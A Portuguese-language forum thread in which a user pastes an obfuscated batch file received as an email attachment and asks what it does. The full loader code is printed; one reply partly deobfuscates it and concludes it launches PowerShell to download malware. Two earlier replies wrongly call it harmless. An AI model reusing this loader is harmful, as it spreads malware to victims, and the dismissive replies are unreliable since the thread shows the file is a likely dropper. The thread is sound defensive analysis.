Ir ao conteúdo
  • Comunicados

    • diego_moicano

      Gostaria de se tornar um analista em Remoção de Malware?   07-12-2015

      Gostaria de se tornar um analista em Remoção de Malware? O Fórum Clube do Hardware deu início a um programa de treinamento em análises de log. Os interessados deverão enviar um email para aprendizes (arroba) clubedohardware (ponto) com (ponto) br respondendo as seguintes perguntas: Por que você gostaria de aprender a analisar logs? Possui tempo hábil para o treinamento? Tem conhecimentos em informática? Se sim descreva-os. Possui inglês para leitura? Qual seu objetivo após completar o treinamento?   Não se esqueça de incluir no e-mail o seu nome de usuário (fornecer o link também), idade e cidade onde vive. Adicione também qualquer experiência e/ou razão sobre o porquê você seria um bom Analista. É digno de nota que apenas os que forem selecionados receberão resposta por MP (Mensagem Pessoal), não existe um padrão na escolha dos futuros aprendizes, todos os e-mails serão lidos e serão analisados de forma imparcial, portanto não será permitido reclamações neste aspecto. O treinamento é dado no próprio fórum. Quando um aprendiz é selecionado ele é movido para um novo grupo, onde terá acesso a fóruns fechados para os demais usuários onde poderá dar inicio ao seu treinamento. Importante: A cada 30 dias os e-mails não selecionados serão apagados, portanto você pode enviar um novo e-mail após 1 mês, e-mails enviados antes serão desconsiderados.  
    • Gabriel Torres

      Seja um moderador do Clube do Hardware!   12-02-2016

      Prezados membros do Clube do Hardware, Está aberto o processo de seleção de novos moderadores para diversos setores ou áreas do Clube do Hardware. Os requisitos são:   Pelo menos 500 posts e um ano de cadastro; Boa frequência de participação; Ser respeitoso, cordial e educado com os demais membros; Ter bom nível de português; Ter razoável conhecimento da área em que pretende atuar; Saber trabalhar em equipe (com os moderadores, coordenadores e administradores).   Os interessados deverão enviar uma mensagem privada para o usuário @Equipe Clube do Hardware com o título "Candidato a moderador". A mensagem deverá conter respostas às perguntas abaixo:   Qual o seu nome completo? Qual sua data de nascimento? Qual sua formação/profissão? Já atuou como moderador em algo outro fórum, se sim, qual? De forma sucinta, explique o porquê de querer ser moderador do fórum e conte-nos um pouco sobre você.   OBS: Não se trata de função remunerada. Todos que fazem parte do staff são voluntários.

Recommended Posts

Galera,

Hoje na empresa recebi um e-mail com um arquivo em anexo em formato .bat. Sabendo que é um arquivo executável, abri com o bloco de notas, e o mesmo havia o código abaixo. Gostaria de saber o que significa esses códigos, e em suma, o que aconteceria se eu executasse este arquivo. Segue abaixo:

 

@echo off cd %SystemRoot%\System32 set NCfi= Set NCfi=%NCfi%u3k1sLBVfAanWObz Set NCfi=%NCfi%lpXhCdxv6UMNGqRg Set NCfi=%NCfi%9mtjTP0JE48SoHY5 Set NCfi=%NCfi%QyZDw7irKIFc2e set aa=^| set data= Set data=%data%%NCfi:~54,1%%NCfi:~40,1%%NCfi:~22,1%(" Set data=%data%%NCfi:~57,1%%NCfi:~40,1%%NCfi:~18,1%(%NCfi:~11,1% Set data=%data%%NCfi:~40,1%%NCfi:~12,1%-%NCfi:~13,1%%NCfi:~14,1% Set data=%data%%NCfi:~39,1%%NCfi:~61,1%%NCfi:~20,1%%NCfi:~36,1% Set data=%data%%NCfi:~11,1%%NCfi:~40,1%%NCfi:~36,1%.%NCfi:~52,1% Set data=%data%%NCfi:~61,1%%NCfi:~14,1%%NCfi:~59,1%%NCfi:~5,1%%NCfi:~54,1% Set data=%data%%NCfi:~61,1%%NCfi:~11,1%%NCfi:~34,1%). Set data=%data%%NCfi:~51,1%%NCfi:~44,1%%NCfi:~12,1%%NCfi:~11,1%%NCfi:~5,1% Set data=%data%%NCfi:~44,1%%NCfi:~9,1%%NCfi:~51,1%%NCfi:~4,1%%NCfi:~34,1% Set data=%data%%NCfi:~30,1%%NCfi:~54,1%%NCfi:~27,1%%NCfi:~31,1%( Set data=%data%'%NCfi:~19,1%%NCfi:~34,1%%NCfi:~34,1% Set data=%data%%NCfi:~17,1%%NCfi:~4,1%:// Set data=%data%%NCfi:~21,1%%NCfi:~16,1%%NCfi:~33,1%.%NCfi:~61,1% Set data=%data%%NCfi:~21,1%%NCfi:~54,1%%NCfi:~44,1%%NCfi:~31,1%%NCfi:~61,1% Set data=%data%.%NCfi:~59,1%%NCfi:~44,1%%NCfi:~33,1%/ Set data=%data%?%NCfi:~21,1%%NCfi:~33,1%%NCfi:~21,1%%NCfi:~54,1% Set data=%data%%NCfi:~23,1%%NCfi:~48,1%%NCfi:~28,1%%NCfi:~45,1%%NCfi:~46,1% Set data=%data%%NCfi:~10,1%%NCfi:~46,1%%NCfi:~51,1%%NCfi:~0,1%%NCfi:~57,1% Set data=%data%%NCfi:~39,1%%NCfi:~21,1%%NCfi:~43,1%%NCfi:~13,1%%NCfi:~19,1% Set data=%data%%NCfi:~55,1%%NCfi:~14,1%%NCfi:~42,1%%NCfi:~12,1%%NCfi:~58,1% Set data=%data%%NCfi:~34,1%%NCfi:~57,1%%NCfi:~47,1%%NCfi:~51,1%%NCfi:~5,1% Set data=%data%%NCfi:~31,1%%NCfi:~7,1%%NCfi:~0,1%%NCfi:~60,1%%NCfi:~46,1% Set data=%data%%NCfi:~23,1%%NCfi:~59,1%%NCfi:~61,1%%NCfi:~3,1%%NCfi:~26,1% Set data=%data%%NCfi:~6,1%%NCfi:~36,1%%NCfi:~11,1%%NCfi:~35,1%%NCfi:~16,1% Set data=%data%%NCfi:~56,1%%NCfi:~24,1%%NCfi:~5,1%%NCfi:~38,1%%NCfi:~14,1% Set data=%data%%NCfi:~11,1%%NCfi:~21,1%%NCfi:~58,1%%NCfi:~3,1%%NCfi:~52,1% Set data=%data%%NCfi:~4,1%%NCfi:~12,1%%NCfi:~25,1%%NCfi:~15,1%%NCfi:~41,1% Set data=%data%%NCfi:~44,1%%NCfi:~8,1%%NCfi:~34,1%%NCfi:~24,1%%NCfi:~57,1% Set data=%data%%NCfi:~28,1%%NCfi:~48,1%%NCfi:~61,1%%NCfi:~26,1%%NCfi:~29,1% Set data=%data%%NCfi:~39,1%%NCfi:~23,1%/%NCfi:~51,1%%NCfi:~12,1% Set data=%data%%NCfi:~33,1%%NCfi:~19,1%%NCfi:~20,1%%NCfi:~59,1%%NCfi:~51,1% Set data=%data%%NCfi:~3,1%%NCfi:~40,1%%NCfi:~58,1%%NCfi:~44,1%%NCfi:~31,1% Set data=%data%%NCfi:~39,1%%NCfi:~55,1%%NCfi:~16,1%%NCfi:~57,1%+ Set data=%data%%NCfi:~28,1%%NCfi:~14,1%%NCfi:~59,1%+/ Set data=%data%%NCfi:~29,1%%NCfi:~59,1%%NCfi:~36,1%%NCfi:~37,1%%NCfi:~6,1% Set data=%data%%NCfi:~10,1%%NCfi:~2,1%%NCfi:~3,1%%NCfi:~46,1%%NCfi:~42,1% Set data=%data%%NCfi:~51,1%%NCfi:~39,1%%NCfi:~18,1%%NCfi:~0,1%%NCfi:~60,1% Set data=%data%%NCfi:~16,1%%NCfi:~52,1%=' Set data=%data%)"); echo %%data%%%aa%%NCfi:~12,1%%NCfi:~54,1%%NCfi:~11,1%%NCfi:~21,1%%NCfi:~44,1%%NCfi:~52,1%%NCfi:~4,1%%NCfi:~37,1%%NCfi:~44,1%%NCfi:~52,1%%NCfi:~61,1%%NCfi:~55,1%%NCfi:~43,1%%NCfi:~19,1%%NCfi:~61,1%%NCfi:~16,1%%NCfi:~16,1%\%NCfi:~23,1%%NCfi:~3,1%.%NCfi:~38,1%\%NCfi:~17,1%%NCfi:~44,1%%NCfi:~52,1%%NCfi:~61,1%%NCfi:~55,1%%NCfi:~4,1%%NCfi:~19,1%%NCfi:~61,1%%NCfi:~16,1%%NCfi:~16,1%.%NCfi:~61,1%%NCfi:~22,1%%NCfi:~61,1% -%NCfi:~11,1%%NCfi:~44,1%%NCfi:~17,1% -%NCfi:~52,1%%NCfi:~54,1%%NCfi:~11,1% %NCfi:~3,1%

Compartilhar este post


Link para o post
Compartilhar em outros sites

Arquio .bat não é literalmente um vírus e sim a extensão da linguagem de programação batch que não é mais do que um arquivo em lotes, porém dependendo do que foi programado dá para causar danos a seus arquivos em geral.

Compartilhar este post


Link para o post
Compartilhar em outros sites

Esse arquivo não vai danificar seu sistema. Resumindo: Não é um virus

e se a pergunta foi generalizada: batch é só uma extensão que interpreta o prompt de comando do Windows.

Compartilhar este post


Link para o post
Compartilhar em outros sites
Postado (editado)

De fato, nenhuma extensão "é vírus" por si só, mas este arquivo está bem estranho e acho que ele perdeu a formatação quando você colou seu conteúdo aqui no fórum. De repente se você editar e usar um bloco de código (botão <>) vai melhorar. Ou você poderia comprimir este arquivo com uma senha e anexar aqui (mas não sei se o fórum ou suas regras permitem).

 

Bem, eu fui ajustando o arquivo aqui e realmente ele tenta executar algo:

 

C:\Windows\System32>Set data= ZPC(" 7Pl(a Pn-WO TIXm aPm.Q IOrsZ Ia ).  4nas 4f
1  GZUq( 'p    1:// hzg.I hZ4qI .r4g/ ?hghZ dHM8S AS  7 ThEWp DOJni  7o s qB KS
drIk6 Lma9z wxsjO ahikQ 1nvb0 4V x7 MHI6N Td/ n gpXr  kPi4q TDz7+ MOr+/ NrmtL A3
kSJ  Tl K zQ='; )"); echo %data%  | nZah4Q1t4QIDEpIzz\dk.j\ 4QID1pIzz.ICI -a4  -
QZa k
'nZah4Q1t4QIDEpIzz\dk.j\' is not recognized as an internal or external command,
operable program or batch file.

Parece ter algum bug, ou eu não descobri ainda como desofuscar totalmente. Somando essa clara intenção de ocultar o que o script faz com o fato de receber um .bat anexo num e-mail, eu diria que não é confiável e tem grandes chances de ser vírus mesmo.

 

UPDATE: Pelo padrão depois do pipe (|), deduzi que este .bat chama o PowerShell e parece que eu estava certo. A string nZah4Q1t4QIDEpIzz\dk.j\ 4QID1pIzz.ICI parece ser decodificada para WindowsPowerShell\v1.0\PowerShell.exe, que tá embaixo da %SystemRoot%\System32, o que bate com o primeiro comando deste .bat. Ou seja, este .bat de fato chama o PowerShell, provavelmente para baixar um malware (ainda tem o padrão parecido com uma URL em 1://), o que me faz pensar que este .bat é um dropper/downloader. Se você tiver o arquivo intacto do jeito que recebeu posso tentar ajudar mais.

 

Abraço.

Editado por Fernando Mercês
  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário






Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas publicações sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

×